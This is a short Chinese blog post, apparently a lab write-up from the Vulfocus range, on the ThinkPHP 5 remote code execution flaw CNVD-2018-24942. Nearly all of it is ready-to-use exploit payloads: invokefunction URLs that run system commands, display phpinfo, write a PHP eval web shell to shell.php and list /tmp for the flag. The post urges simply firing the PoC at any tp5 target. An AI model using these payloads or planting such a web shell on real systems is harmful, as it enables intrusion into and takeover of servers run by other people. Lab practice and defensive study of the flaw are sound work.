Vulfocus靶场 | thinkphp 代码执行 (CNVD-2018-24942)


tp5的经典漏洞

遇到tp5漏洞直接拿poc打就行

漏洞利用

1,利用system函数远程命令执行

Payload如下:

?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

2,查看phpinfo

payload:如下

?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

3,写shell

linux shell脚本原因会过滤$_POST,所以要加/转义

payload如下:

?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo “<?php @eval(/$_POST[‘cmd’])?>” >shell.php

 

拿flag

?s=index/think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

Vulfocus靶场 | thinkphp 代码执行 (CNVD-2018-24942)

 

 

原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/279752.html

(0)
上一篇 2022年8月11日
下一篇 2022年8月11日

相关推荐

发表回复

登录后才能评论